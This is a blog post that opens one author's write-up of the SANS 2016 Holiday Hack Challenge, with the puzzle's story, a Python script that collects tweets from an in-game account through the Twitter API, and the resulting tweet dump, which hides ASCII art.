Solving the SANS 2016 Holiday Hack Challenge

      9 Comments on Solving the SANS 2016 Holiday Hack Challenge

tldr; SANS released the 2016 Christmas Holiday Hack Challenge.This serves as my official submitted answer, and my offering to you dear reader in case you want to see how I approached the challenges.

So settle in this is going to be a long post. At the time of writing the challenge is still live and SANS typically keep the servers up so the historical challenges can still be played. As this is a long post you may not want to read it all, if your here looking for help or the answer to a specific challenge then use the index to jump to the specific question.

Index:

Ruined presents. A shattered Christmas tree. Needles strewn all about. Obvious signs of a fight. And there, beside it all, was Santa’s big blue sack. But Santa himself was nowhere to be found.

In shock, Jessica uttered, “Someone has abducted Santa Claus!”

Josh was horrified. “Who would do such a thing? And on Christmas Eve, no less. They’ll destroy Christmas! But why?”

The kids scanned for clues, and there on the floor, they found a most unexpected item: a small, rectangular piece of cardstock. Picking it up, Joshua announced, “Hey! This looks like Santa’s business card. It must have fallen out of his pocket while someone was kidnapping him.”

Jess took the card from Joshua’s hands and read it. “It is his business card. And we’re the only ones who know that Santa has disappeared. We’ve got to do something. If we don’t find and rescue Santa, Christmas will be destroyed! Let’s look closer at this card to see if it can be any help in finding out what happened.”

From the business card we got from talking to the Dosis children we now know Santa’s social media accounts.

Taking a look at the @santawclaus feed we can see a lot of seemingly random text. It will be much easier to read if its all in one place. Twitter has an API we can use to read tweets, and a quick google shows us some really useful sample code we can adjust.

# Source: http://www.craigaddyman.com/mining-all-tweets-with-python/
from twython import Twython # pip install twython
import time # standard lib
''' Go to https://apps.twitter.com/ to register your app to get your api keys '''
CONSUMER_KEY = ''
CONSUMER_SECRET = ''
ACCESS_KEY = ''
ACCESS_SECRET = ''

twitter = Twython(CONSUMER_KEY,CONSUMER_SECRET,ACCESS_KEY,ACCESS_SECRET)
lis = [798175529463676928] ## this is the latest starting tweet id
for i in range(0, 16): ## iterate through all tweets
## tweet extract method with the last list item as the max_id
    user_timeline = twitter.get_user_timeline(screen_name="santawclaus",
    count=200, include_retweets=False, max_id=lis[-1])
    

    with open('tweetout.txt', 'a') as out:

        for tweet in user_timeline:
            print tweet['text'] ## print the tweet
            lis.append(tweet['id']) ## append tweet id's
            out.write('{0}\n'.format(tweet['text']))
            
    time.sleep(30)

Running this outputs:

SANTAELFHOHOHOCHRISTMASSANTACHRISTMASPEACEONEARTHCHRISTMASELFSANTAELFHOHOHO
GOODWILLTOWARDSMENSANTAPEACEONEARTHHOHOHOJOYSANTAGOODWILLTOWARDSMENJOYJOYQQ
GOODWILLTOWARDSMENGOODWILLTOWARDSMENJOYHOHOHOJOYELFELFPEACEONEARTHJOYHOHOHO
GOODWILLTOWARDSMENSANTACHRISTMASCHRISTMASPEACEONEARTHNORTHPOLEHOHOHOELFELFQ
JOYNORTHPOLECHRISTMASPEACEONEARTHNORTHPOLEJOYGOODWILLTOWARDSMENELFCHRISTMAS
CHRISTMASGOODWILLTOWARDSMENELFHOHOHOCHRISTMASPEACEONEARTHPEACEONEARTHJOYELF
HOHOHOGOODWILLTOWARDSMENNORTHPOLEGOODWILLTOWARDSMENSANTAPEACEONEARTHELFELFQ
GOODWILLTOWARDSMENP???????????????????????????????4CHRISTMASJOYELFELFSANTAQ
NORTHPOLEHOHOHOELFf...............................]PEACEONEARTHHOHOHOSANTAQ
SANTASANTAJOYELFQQf...............................]PEACEONEARTHCHRISTMASELF
CHRISTMASELFELFJOYf...............................]HOHOHOSANTAHOHOHOELFJOYQ
SANTASANTAJOYJOYQQf...............................]GOODWILLTOWARDSMENHOHOHO
NORTHPOLEELFELFELFf...............................]PEACEONEARTHHOHOHOSANTAQ
NORTHPOLECHRISTMASf...............................]PEACEONEARTHCHRISTMASJOY
PEACEONEARTHSANTAQf...............................]PEACEONEARTHNORTHPOLEELF
JOYCHRISTMASSANTAQf...............................]CHRISTMASHOHOHOCHRISTMAS
NORTHPOLEHOHOHOJOYf...............................]PEACEONEARTHPEACEONEARTH
SANTAELFELFJOYJOYQf.......aaaaaa/....._aaaaa......]PEACEONEARTHNORTHPOLEELF
GOODWILLTOWARDSMENf.......QQWQWQf.....]ELFWQ......]HOHOHOHOHOHOCHRISTMASJOY
NORTHPOLESANTAJOYQf.......HOHOHOf.....]JOYQQ......]CHRISTMASCHRISTMASHOHOHO
NORTHPOLEELFJOYJOYf.......SANTAQf.....]JOYQQ......]NORTHPOLEPEACEONEARTHELF
SANTAPEACEONEARTHQf.......HOHOHOf.....]SANTA......]PEACEONEARTHCHRISTMASELF
ELFSANTASANTAJOYQQf.......HOHOHOf.....]JOYQW......]CHRISTMASPEACEONEARTHJOY
JOYHOHOHONORTHPOLEf.......SANTAQ[.....)ELFQE......]PEACEONEARTHPEACEONEARTH
HOHOHOCHRISTMASJOYf.......$WJOYQ(......$WQQ(......]GOODWILLTOWARDSMENSANTAQ
JOYPEACEONEARTHELFf.......)JOYQ@........??'.......]SANTAPEACEONEARTHHOHOHOQ
JOYJOYPEACEONEARTHL........?$QV'..................]CHRISTMASJOYNORTHPOLEJOY
SANTAJOYCHRISTMASQk...............................jGOODWILLTOWARDSMENJOYJOY
GOODWILLTOWARDSMENW...............................jJOYNORTHPOLEJOYELFSANTAQ
HOHOHOSANTAJOYELFQQ...............................GOODWILLTOWARDSMENHOHOHOQ
CHRISTMASSANTASANTA;................;............=JOYNORTHPOLEPEACEONEARTHQ
GOODWILLTOWARDSMENQL...............)L............jHOHOHOHOHOHOCHRISTMASELFQ
CHRISTMASHOHOHOELFQQ...............dQ,..........>GOODWILLTOWARDSMENHOHOHOQQ
GOODWILLTOWARDSMENQQL.............>QQm,........_HOHOHOHOHOHOCHRISTMASELFELF
SANTACHRISTMASELFELFQc..........._mJOYQc......aPEACEONEARTHCHRISTMASSANTAQQ
CHRISTMASPEACEONEARTHQw........._mSANTAWmwaawGOODWILLTOWARDSMENSANTAJOYELFQ
PEACEONEARTHELFSANTAELFQw,,..__yHOHOHOELFQWQQWGOODWILLTOWARDSMENHOHOHOSANTA
ELFHOHOHONORTHPOLEELFJOYWGOODWILLTOWARDSMENCHRISTMASSANTACHRISTMASJOYSANTAQ
ELFELFHOHOHOHOHOHOHOHOHONORTHPOLEJOYHOHOHOGOODWILLTOWARDSMENELFELFELFSANTAQ
ELFHOHOHOJOYPEACEONEARTHPEACEONEARTHJOYGOODWILLTOWARDSMENJOYELFPEACEONEARTH
GOODWILLTOWARDSMENJOYGOODWILLTOWARDSMENGOODWILLTOWARDSMENSANTAELFJOYJOYJOYQ
ELFSANTAPEACEONEARTHJOYJOYQQDT????????????????????4NORTHPOLEPEACEONEARTHELF
NORTHPOLENORTHPOLESANTAQWT^.......................]NORTHPOLEELFHOHOHOJOYELF
HOHOHOHOHOHOCHRISTMASQQP`.........................]JOYGOODWILLTOWARDSMENELF
ELFPEACEONEARTHSANTAQQ(...........................]HOHOHOSANTACHRISTMASJOYQ
JOYJOYCHRISTMASELFJOY(............................]GOODWILLTOWARDSMENHOHOHO
CHRISTMASELFELFELFQQf.............................]HOHOHONORTHPOLEJOYELFJOY
SANTACHRISTMASJOYQQD..............................]HOHOHOHOHOHOSANTASANTAQQ
HOHOHOELFSANTAELFQQ(..............................]GOODWILLTOWARDSMENHOHOHO
GOODWILLTOWARDSMENW...............................]NORTHPOLEHOHOHOHOHOHOJOY
CHRISTMASHOHOHOJOYF...............................]GOODWILLTOWARDSMENSANTAQ
CHRISTMASCHRISTMAS[.........._aaaaaaaaaaaaaaaaaaaajPEACEONEARTHELFNORTHPOLE
SANTANORTHPOLEELFQ(........jJOYQWQWWQWWQWWWWWWWWWGOODWILLTOWARDSMENHOHOHOQQ
ELFPEACEONEARTHELF;.......jWWSANTAGOODWILLTOWARDSMENSANTAGOODWILLTOWARDSMEN
ELFJOYNORTHPOLEJOY`.......QWGOODWILLTOWARDSMENGOODWILLTOWARDSMENCHRISTMASQQ
PEACEONEARTHJOYELF.......]WPEACEONEARTHCHRISTMASNORTHPOLEPEACEONEARTHHOHOHO
CHRISTMASJOYHOHOHO.......]HOHOHOELFGOODWILLTOWARDSMENPEACEONEARTHCHRISTMASQ
JOYCHRISTMASJOYELF.......]PEACEONEARTHCHRISTMASGOODWILLTOWARDSMENELFHOHOHOQ
JOYPEACEONEARTHJOY.......)WGOODWILLTOWARDSMENSANTANORTHPOLEJOYPEACEONEARTHQ
CHRISTMASHOHOHOELF........$WPEACEONEARTHNORTHPOLESANTAPEACEONEARTHSANTAJOYQ
JOYHOHOHOELFELFJOY;.......-QWCHRISTMASGOODWILLTOWARDSMENPEACEONEARTHJOYELFQ
HOHOHOCHRISTMASJOY(........-?$QWJOYCHRISTMASSANTACHRISTMASCHRISTMASHOHOHOQQ
ELFJOYELFCHRISTMASf...............................]PEACEONEARTHNORTHPOLEJOY
ELFHOHOHOSANTAELFQh...............................]GOODWILLTOWARDSMENHOHOHO
SANTACHRISTMASELFQQ,..............................]PEACEONEARTHPEACEONEARTH
GOODWILLTOWARDSMENQL..............................]HOHOHOELFCHRISTMASSANTAQ
GOODWILLTOWARDSMENQQ,.............................]PEACEONEARTHELFHOHOHOJOY
NORTHPOLESANTAHOHOHOm.............................]HOHOHOGOODWILLTOWARDSMEN
PEACEONEARTHCHRISTMASg............................]ELFHOHOHOSANTANORTHPOLEQ
NORTHPOLECHRISTMASJOYQm,..........................]NORTHPOLECHRISTMASSANTAQ
SANTASANTACHRISTMASSANTAw,........................]GOODWILLTOWARDSMENSANTAQ
GOODWILLTOWARDSMENHOHOHOWQga,,....................]PEACEONEARTHPEACEONEARTH
PEACEONEARTHJOYCHRISTMASELFWCHRISTMASGOODWILLTOWARDSMENJOYPEACEONEARTHSANTA
PEACEONEARTHPEACEONEARTHCHRISTMASJOYSANTAPEACEONEARTHCHRISTMASELFHOHOHOELFQ
GOODWILLTOWARDSMENNORTHPOLECHRISTMASPEACEONEARTHHOHOHOELFJOYNORTHPOLEELFELF
JOYGOODWILLTOWARDSMENSANTACHRISTMASJOYPEACEONEARTHHOHOHOELFCHRISTMASHOHOHOQ
HOHOHOCHRISTMASHOHOHOSANTANORTHPOLEPEACEONEARTHJOYPEACEONEARTHJOYJOYHOHOHOQ
JOYELFGOODWILLTOWARDSMENSANTAQBTT???TT$SANTASANTAPEACEONEARTHNORTHPOLEJOYQQ
SANTACHRISTMASCHRISTMASJOYWP"`.........-"9NORTHPOLEPEACEONEARTHCHRISTMASELF
SANTAELFELFELFSANTAJOYQQWP`...............-4JOYSANTANORTHPOLEJOYSANTASANTAQ
ELFELFELFHOHOHOHOHOHOQQ@'..................."$CHRISTMASELFSANTANORTHPOLEELF
ELFCHRISTMASSANTAELFQQP`.....................-$WELFWPEACEONEARTHSANTASANTAQ
SANTANORTHPOLEJOYELFQE........................-$SANTAELFWGOODWILLTOWARDSMEN
NORTHPOLEELFELFELFQQ@`.........................-QWPEACEONEARTHPEACEONEARTHQ
PEACEONEARTHJOYJOYQQ(...........................]CHRISTMASHOHOHOELFSANTAJOY
HOHOHOCHRISTMASELFQP.............................$NORTHPOLEJOYQWJOYWJOYWELF
SANTACHRISTMASJOYQQ(.............................]WSANTAWPEACEONEARTHJOYELF
HOHOHOSANTAJOYELFQW............_aaaas,............QWCHRISTMASQWHOHOHOSANTAQ
SANTAPEACEONEARTHQf........._wELFWWWWQQw,.........3ELFHOHOHOJOYJOYSANTAELFQ
CHRISTMASSANTAELFQ[........>HOHOHOELFELFQc........]CHRISTMASPEACEONEARTHELF
CHRISTMASCHRISTMAS(......._PEACEONEARTHJOY/.......)NORTHPOLESANTAELFQWELFWQ
PEACEONEARTHSANTAQ`.......dNORTHPOLEHOHOHOm.......:NORTHPOLEWCHRISTMASJOYQQ
PEACEONEARTHELFELF........SANTANORTHPOLEJOY;.......SANTASANTAJOYQWSANTAJOYQ
PEACEONEARTHSANTAQ.......]ELFSANTAJOYJOYELF[.......GOODWILLTOWARDSMENSANTAQ
GOODWILLTOWARDSMEN.......]ELFNORTHPOLEJOYQQf.......ELFSANTAJOYHOHOHOQQWELFQ
GOODWILLTOWARDSMEN.......]ELF.......]JOYELF[.......PEACEONEARTHPEACEONEARTH
HOHOHOJOYNORTHPOLE.......]JOY.......]SANTAQ'.......SANTASANTAQQWNORTHPOLEQQ
CHRISTMASNORTHPOLE:......)WQQ.......]SANTAD........NORTHPOLESANTAELFWELFJOY
ELFCHRISTMASSANTAQ;......-JOY.......]ELFQW'.......:PEACEONEARTHCHRISTMASJOY
CHRISTMASSANTAELFQ[.......WQQ.......]ELFD'........=HOHOHOGOODWILLTOWARDSMEN
ELFELFSANTAJOYELFQL.......]QQ.......]ELF..........]PEACEONEARTHQWCHRISTMASQ
NORTHPOLESANTAELFQm.......+QQ.......]ELF;.........jWNORTHPOLENORTHPOLEELFWQ
JOYELFHOHOHOSANTAQQ.................]JOY[.........mCHRISTMASCHRISTMASQQWELF
NORTHPOLENORTHPOLEQ[................]JOYL........_PEACEONEARTHSANTASANTAELF
SANTANORTHPOLEJOYQQm................]ELFk........dHOHOHOPEACEONEARTHQQWJOYQ
PEACEONEARTHHOHOHOQQc...............]JOYm.......]PEACEONEARTHHOHOHOWHOHOHOQ
CHRISTMASHOHOHOJOYQQm...............]ELFQ......_GOODWILLTOWARDSMENNORTHPOLE
JOYELFNORTHPOLEJOYELFL..............]JOYQ;....>SANTAHOHOHONORTHPOLEELFSANTA
PEACEONEARTHELFHOHOHOQ,.............]JOYQ[...wPEACEONEARTHELFSANTAWHOHOHOQQ
CHRISTMASELFELFELFJOYQ6.............]ELFQL_wPEACEONEARTHHOHOHOCHRISTMASELFQ
HOHOHOJOYNORTHPOLEQWELFwaaaaaaaaaaaajPEACEONEARTHGOODWILLTOWARDSMENSANTAQWQ
CHRISTMASELFPEACEONEARTHWWWQWWQWWWWELFELFSANTANORTHPOLESANTAELFQQWJOYHOHOHO
CHRISTMASNORTHPOLEHOHOHOHOHOHOCHRISTMASGOODWILLTOWARDSMENNORTHPOLEHOHOHOWQQ
GOODWILLTOWARDSMENNORTHPOLENORTHPOLESANTANORTHPOLEJOYSANTAELFELFWCHRISTMASQ
GOODWILLTOWARDSMENHOHOHOHOHOHONORTHPOLEELFSANTAELFNORTHPOLEPEACEONEARTHELFQ
PEACEONEARTHELFELFQWPEACEONEARTHPEACEONEARTHHOHOHOPEACEONEARTHWNORTHPOLEWQQ
ELFPEACEONEARTHCHRISTMASELFPEACEONEARTHJOYNORTHPOLEGOODWILLTOWARDSMENSANTAQ
SANTASANTASANTAJOYELFJOYWGOODWILLTOWARDSMENPEACEONEARTHSANTAWPEACEONEARTHQQ
PEACEONEARTHSANTAJOYGOODWILLTOWARDSMENSANTACHRISTMASELFCHRISTMASELFJOYQWELF
CHRISTMASCHRISTMASELFELFHOHOHOWJOYWNORTHPOLESANTACHRISTMASWSANTAJOYQQWJOYQQ
ELFJOYSANTAJOYJOYQQWJOYWPEACEONEARTHNORTHPOLEHOHOHOHOHOHONORTHPOLEELFJOYELF
ELFNORTHPOLEJOYSANTANORTHPOLECHRISTMASQQWPEACEONEARTHJOYQWHOHOHOJOYWJOYELFQ
NORTHPOLECHRISTMASHOHOHOSANTAWPEACEONEARTHGOODWILLTOWARDSMENCHRISTMASHOHOHO
GOODWILLTOWARDSMENSANTACHRISTMASSANTAQQWELFHOHOHOSANTAQQWJOYSANTAQWSANTAJOY
JOYNORTHPOLEJOYPEACEONEARTHWELFELFQQWNORTHPOLEQWHOHOHONORTHPOLEELFELFHOHOHO
CHRISTMASSANTASANTAWJOYWCHRISTMASHOHOHONORTHPOLEJOYQQWHOHOHOSANTAWNORTHPOLE
PEACEONEARTHSANTASANTAPEACEONEARTHNORTHPOLEJOYJOYJOYELFCHRISTMASHOHOHOSANTA
SANTASANTACHRISTMASJOYJOYJOYELFJOYQWHOHOHOJOYQWPEACEONEARTHELFQQWCHRISTMASQ
GOODWILLTOWARDSMENELFPEACEONEARTHHOHOHOCHRISTMASELFQWHOHOHOWCHRISTMASHOHOHO
CHRISTMASELFELFPEACEONEARTHWELFQQWHOHOHOQQWCHRISTMASELFJOYNORTHPOLEHOHOHOQQ
SANTAPEACEONEARTHQQWJOYWCHRISTMASHOHOHOPEACEONEARTHGOODWILLTOWARDSMENJOYQWQ
JOYJOYHOHOHOELFELFP???????????????????????????????4SANTAQQWPEACEONEARTHELFQ
NORTHPOLENORTHPOLEf...............................]PEACEONEARTHQQWHOHOHOWQQ
CHRISTMASJOYHOHOHOf...............................]ELFGOODWILLTOWARDSMENELF
NORTHPOLEELFELFELFf...............................]PEACEONEARTHHOHOHOQQWELF
NORTHPOLEHOHOHOELFf...............................]CHRISTMASJOYQWSANTASANTA
SANTAJOYNORTHPOLEQf...............................]SANTAHOHOHOWJOYCHRISTMAS
GOODWILLTOWARDSMENf...............................]PEACEONEARTHHOHOHOQWJOYQ
ELFPEACEONEARTHELFf...............................]GOODWILLTOWARDSMENHOHOHO
JOYCHRISTMASELFELFf...............................]GOODWILLTOWARDSMENSANTAQ
GOODWILLTOWARDSMENf...............................]NORTHPOLEPEACEONEARTHJOY
ELFSANTAHOHOHOELFQf.......aaaaaa/....._aaaaa......]GOODWILLTOWARDSMENWELFQQ
NORTHPOLEHOHOHOELFf.......QWWWWQf.....]QQWWQ......]HOHOHOHOHOHOQQWJOYSANTAQ
SANTANORTHPOLEJOYQf.......HOHOHOf.....]JOYQQ......]HOHOHOHOHOHONORTHPOLEELF
NORTHPOLEJOYJOYELFf.......JOYELFf.....]SANTA......]NORTHPOLEHOHOHONORTHPOLE
SANTASANTASANTAELFf.......JOYELFf.....]SANTA......]NORTHPOLENORTHPOLEELFELF
GOODWILLTOWARDSMENf.......JOYJOYf.....]JOYQW......]PEACEONEARTHHOHOHOQWELFQ
GOODWILLTOWARDSMENf.......HOHOHO[.....)JOYQE......]HOHOHOELFHOHOHOQQWJOYJOY
JOYNORTHPOLEELFELFf.......$WELFQ(......$WQQ(......]PEACEONEARTHNORTHPOLEELF
NORTHPOLEJOYELFJOYf.......)ELFQ@........??'.......]CHRISTMASPEACEONEARTHJOY
SANTAPEACEONEARTHQL........?$QV'..................]HOHOHOGOODWILLTOWARDSMEN
JOYELFPEACEONEARTHk...............................jJOYSANTACHRISTMASWJOYJOY
SANTAPEACEONEARTHQW...............................jSANTAGOODWILLTOWARDSMENQ
CHRISTMASSANTAELFQQ...............................HOHOHOPEACEONEARTHSANTAQQ
ELFCHRISTMASELFELFQ;................;............=NORTHPOLENORTHPOLEJOYELFQ
NORTHPOLEJOYSANTAQQ[...............)L............jPEACEONEARTHJOYHOHOHOQQWQ
CHRISTMASHOHOHOJOYQm...............dQ,..........>GOODWILLTOWARDSMENQWSANTAQ
SANTACHRISTMASSANTAQL.............>QQm,........_JOYELFGOODWILLTOWARDSMENELF
HOHOHOSANTASANTAJOYQQc..........._mELFQc......aGOODWILLTOWARDSMENSANTAJOYWQ
CHRISTMASHOHOHOJOYJOYQw........._mELFQQWmwaawGOODWILLTOWARDSMENNORTHPOLEELF
NORTHPOLEELFPEACEONEARTHw,,..__yELFJOYJOYQWQWQWGOODWILLTOWARDSMENCHRISTMASQ
JOYNORTHPOLEELFNORTHPOLEWGOODWILLTOWARDSMENNORTHPOLEJOYJOYJOYSANTAQQWELFWQQ
JOYSANTAELFHOHOHOQQWNORTHPOLENORTHPOLEGOODWILLTOWARDSMENSANTASANTAHOHOHOJOY
ELFHOHOHOCHRISTMASCHRISTMASELFPEACEONEARTHHOHOHOELFCHRISTMASHOHOHOELFJOYELF
JOYPEACEONEARTHJOYNORTHPOLEGOODWILLTOWARDSMENHOHOHONORTHPOLEHOHOHOELFELFJOY
HOHOHOPEACEONEARTHELFJOYJOYQV?"~....--"?$CHRISTMASELFWPEACEONEARTHQWHOHOHOQ
CHRISTMASCHRISTMASJOYELFWW?`.............-?CHRISTMASHOHOHOQWELFWSANTAJOYWQQ
SANTAPEACEONEARTHQQWELFQP`.................-4HOHOHOWCHRISTMASNORTHPOLESANTA
CHRISTMASNORTHPOLEJOYQW(.....................)WGOODWILLTOWARDSMENNORTHPOLEQ
GOODWILLTOWARDSMENJOYW'.......................)WSANTAJOYQQWNORTHPOLEHOHOHOQ
JOYNORTHPOLEHOHOHOJOY(.........................)PEACEONEARTHSANTAELFWJOYWQQ
GOODWILLTOWARDSMENQQf...........................4PEACEONEARTHELFQWCHRISTMAS
NORTHPOLEHOHOHOELFQW`...........................-HOHOHOWCHRISTMASCHRISTMASQ
GOODWILLTOWARDSMENQf.............................]JOYJOYSANTAELFWCHRISTMASQ
HOHOHONORTHPOLEJOYQ`.............................-HOHOHOELFQWCHRISTMASSANTA
ELFELFELFJOYHOHOHOE.........._wwQWQQmga,..........$GOODWILLTOWARDSMENJOYWQQ
NORTHPOLECHRISTMASf........_yJOYWSANTAQQg,........]PEACEONEARTHPEACEONEARTH
SANTANORTHPOLEJOYQ[......._ELFELFSANTAELFQ,.......]CHRISTMASSANTASANTAWJOYQ
CHRISTMASCHRISTMAS;.......dPEACEONEARTHJOYk.......=JOYJOYHOHOHOQWJOYWHOHOHO
ELFNORTHPOLEELFELF......._HOHOHOCHRISTMASQQ,.......NORTHPOLEQWSANTASANTAELF
PEACEONEARTHJOYJOY.......]PEACEONEARTHJOYQQ[.......GOODWILLTOWARDSMENELFJOY
HOHOHOELFNORTHPOLE.......]PEACEONEARTHSANTAf.......NORTHPOLEHOHOHOHOHOHOELF
ELFSANTAELFHOHOHOQ.......]NORTHPOLEHOHOHOQQ[.......GOODWILLTOWARDSMENHOHOHO
CHRISTMASCHRISTMAS.......)PEACEONEARTHJOYQQ(.......HOHOHOHOHOHOSANTAWHOHOHO
SANTASANTAELFJOYQQ........HOHOHOCHRISTMASQ@.......:NORTHPOLEELFQWSANTASANTA
CHRISTMASCHRISTMAS;.......]PEACEONEARTHELF[.......>HOHOHOSANTANORTHPOLEQQWQ
HOHOHOPEACEONEARTH[........4HOHOHOJOYELFQf........]PEACEONEARTHHOHOHOHOHOHO
CHRISTMASCHRISTMASL........."HWJOYSANTAD^.........jNORTHPOLENORTHPOLEHOHOHO
GOODWILLTOWARDSMENm............"!???!"`...........NORTHPOLEHOHOHOWJOYQWELFQ
CHRISTMASJOYELFELFQ/.............................]WNORTHPOLECHRISTMASHOHOHO
SANTAJOYCHRISTMASQQk.............................dPEACEONEARTHELFELFHOHOHOQ
SANTAPEACEONEARTHJOY/...........................>NORTHPOLECHRISTMASHOHOHOQQ
ELFSANTASANTASANTAQQm...........................mJOYELFSANTAPEACEONEARTHELF
CHRISTMASCHRISTMASELFk.........................jGOODWILLTOWARDSMENQWJOYWELF
ELFJOYCHRISTMASJOYJOYQL.......................jNORTHPOLENORTHPOLEJOYJOYJOYQ
ELFELFJOYSANTAJOYELFELFg,..................._yGOODWILLTOWARDSMENQQWSANTAELF
PEACEONEARTHJOYELFQWSANTAc.................aQWCHRISTMASHOHOHOSANTAJOYHOHOHO
SANTAJOYJOYPEACEONEARTHELFQa,..........._wQWWHOHOHOSANTAJOYELFQQWJOYSANTAQQ
HOHOHOELFJOYPEACEONEARTHQQWJOYmwwaaaawyJOYWCHRISTMASHOHOHOPEACEONEARTHJOYWQ
ELFCHRISTMASSANTASANTASANTAJOYQQWWWWQWGOODWILLTOWARDSMENJOYELFQWCHRISTMASQQ
ELFCHRISTMASSANTASANTASANTAJOYQQWWWWQWGOODWILLTOWARDSMENJOYELFQWCHRISTMASQQ
SANTAHOHOHOELFPEACEONEARTHGOODWILLTOWARDSMENJOYPEACEONEARTHSANTASANTAJOYWQQ
HOHOHOJOYELFJOYELFQWGOODWILLTOWARDSMENPEACEONEARTHGOODWILLTOWARDSMENELFELFQ
NORTHPOLEJOYJOYELFHOHOHOWPEACEONEARTHNORTHPOLECHRISTMASHOHOHOQWELFJOYQQWJOY
GOODWILLTOWARDSMENSANTAJOYNORTHPOLENORTHPOLEHOHOHOHOHOHOGOODWILLTOWARDSMENQ
CHRISTMASJOYSANTANORTHPOLEV?"-....................]GOODWILLTOWARDSMENQWJOYQ
GOODWILLTOWARDSMENSANTAW?`........................]GOODWILLTOWARDSMENSANTAQ
HOHOHOELFJOYJOYELFQWQQD'..........................]HOHOHONORTHPOLEQWHOHOHOQ
PEACEONEARTHHOHOHOJOYP`...........................]SANTAJOYELFWHOHOHOHOHOHO
PEACEONEARTHHOHOHOQQD`............................]JOYPEACEONEARTHSANTAELFQ
PEACEONEARTHHOHOHOQW'.............................]CHRISTMASJOYELFQWHOHOHOQ
ELFPEACEONEARTHELFQf..............................]PEACEONEARTHELFNORTHPOLE
SANTACHRISTMASJOYQQ`..............................]NORTHPOLEQQWNORTHPOLEQWQ
CHRISTMASHOHOHOELFE...............................]SANTAGOODWILLTOWARDSMENQ
GOODWILLTOWARDSMENf...............................]GOODWILLTOWARDSMENSANTAQ
ELFCHRISTMASELFJOY[.........amWNORTHPOLEGOODWILLTOWARDSMENJOYJOYJOYQWELFWQQ
PEACEONEARTHJOYJOY(......._QQWHOHOHOWJOYWPEACEONEARTHPEACEONEARTHNORTHPOLEQ
NORTHPOLEELFELFJOY`.......mSANTAQQWCHRISTMASQQWGOODWILLTOWARDSMENQQWHOHOHOQ
JOYSANTANORTHPOLEQ`......=CHRISTMASPEACEONEARTHSANTANORTHPOLENORTHPOLESANTA
NORTHPOLESANTAJOYQ.......]NORTHPOLEPEACEONEARTHELFHOHOHOGOODWILLTOWARDSMENQ
ELFNORTHPOLESANTAQ.......]GOODWILLTOWARDSMENQWELFJOYPEACEONEARTHCHRISTMASQQ
HOHOHONORTHPOLEJOY.......]GOODWILLTOWARDSMENJOYJOYQWPEACEONEARTHJOYWSANTAWQ
PEACEONEARTHJOYELF.......-QWSANTAELFWSANTAWHOHOHOPEACEONEARTHCHRISTMASELFQQ
CHRISTMASSANTAJOYQ........]SANTASANTASANTAGOODWILLTOWARDSMENPEACEONEARTHELF
ELFHOHOHOCHRISTMAS;........?ELFJOYPEACEONEARTHELFQWGOODWILLTOWARDSMENHOHOHO
GOODWILLTOWARDSMEN[.........-"????????????????????4ELFCHRISTMASHOHOHOQQWELF
SANTASANTAJOYSANTAL...............................]HOHOHOQWJOYELFQQWJOYJOYQ
NORTHPOLECHRISTMASQ...............................]NORTHPOLEELFQWJOYJOYELFQ
SANTANORTHPOLEELFQWc..............................]GOODWILLTOWARDSMENSANTAQ
JOYSANTACHRISTMASQQm..............................]ELFNORTHPOLECHRISTMASELF
CHRISTMASSANTASANTAQL.............................]PEACEONEARTHWJOYJOYQQWQQ
ELFNORTHPOLEHOHOHOJOYc............................]SANTACHRISTMASJOYELFJOYQ
SANTAELFHOHOHOJOYJOYQQc...........................]PEACEONEARTHSANTAQQWJOYQ
GOODWILLTOWARDSMENSANTAw,.........................]NORTHPOLEHOHOHONORTHPOLE
NORTHPOLENORTHPOLEQWSANTAa,.......................]PEACEONEARTHWSANTAWJOYQQ
SANTACHRISTMASHOHOHOELFELFQQgwaaaaaaaaaaaaaaaaaaaajCHRISTMASJOYPEACEONEARTH
SANTAHOHOHOPEACEONEARTHSANTAQWWWWWWWWWWWWWWWWWWWWHOHOHOELFJOYCHRISTMASELFQQ
NORTHPOLESANTASANTANORTHPOLESANTAPEACEONEARTHCHRISTMASELFHOHOHOELFJOYWJOYQQ
JOYELFJOYNORTHPOLEPEACEONEARTHJOYGOODWILLTOWARDSMENPEACEONEARTHELFELFELFELF
SANTAJOYCHRISTMASQQWELFWGOODWILLTOWARDSMENSANTANORTHPOLENORTHPOLEJOYWSANTAQ
JOYPEACEONEARTHSANTAGOODWILLTOWARDSMENJOYPEACEONEARTHJOYELFJOYCHRISTMASJOYQ
PEACEONEARTHJOYHOHOHOJOYHOHOHONORTHPOLEHOHOHOGOODWILLTOWARDSMENPEACEONEARTH
SANTASANTAELFJOYQQP???????????????????????????????4PEACEONEARTHJOYQWSANTAQQ
ELFELFHOHOHOHOHOHOf...............................]GOODWILLTOWARDSMENJOYELF
SANTAJOYELFELFELFQf...............................]CHRISTMASNORTHPOLESANTAQ
SANTAHOHOHOELFJOYQf...............................]GOODWILLTOWARDSMENELFELF
GOODWILLTOWARDSMENf...............................]CHRISTMASCHRISTMASJOYQWQ
JOYSANTAELFJOYELFQf...............................]PEACEONEARTHSANTAWHOHOHO
CHRISTMASCHRISTMASf...............................]GOODWILLTOWARDSMENSANTAQ
PEACEONEARTHSANTAQf...............................]HOHOHOHOHOHOJOYWHOHOHOWQ
JOYELFHOHOHOJOYELFf...............................]GOODWILLTOWARDSMENHOHOHO
SANTANORTHPOLEJOYQf...............................]PEACEONEARTHNORTHPOLEELF
HOHOHOGOODWILLTOWARDSMENSANTAWJOYQ@'.............sPEACEONEARTHELFWCHRISTMAS
GOODWILLTOWARDSMENHOHOHOCHRISTMASF............._yWWPEACEONEARTHELFELFJOYWQQ
SANTAGOODWILLTOWARDSMENQQWELFQQ@'.............sQWGOODWILLTOWARDSMENJOYJOYQQ
NORTHPOLECHRISTMASNORTHPOLEQQWF............._yQWELFELFELFSANTASANTAHOHOHOQQ
NORTHPOLECHRISTMASELFQQWELFQ@'.............aWCHRISTMASELFPEACEONEARTHQQWELF
SANTAHOHOHOHOHOHOJOYWSANTAQ?............._yQWPEACEONEARTHCHRISTMASQQWJOYJOY
CHRISTMASSANTACHRISTMASQQ@'.............aJOYNORTHPOLESANTAELFHOHOHOSANTAELF
SANTACHRISTMASNORTHPOLEW?............._yCHRISTMASCHRISTMASCHRISTMASHOHOHOQQ
PEACEONEARTHHOHOHOQWQQD'.............aHOHOHOHOHOHONORTHPOLEHOHOHOELFWHOHOHO
HOHOHOCHRISTMASELFELF!............._mGOODWILLTOWARDSMENCHRISTMASSANTASANTAQ
JOYPEACEONEARTHELFQD'.............aCHRISTMASPEACEONEARTHSANTAHOHOHOWSANTAQQ
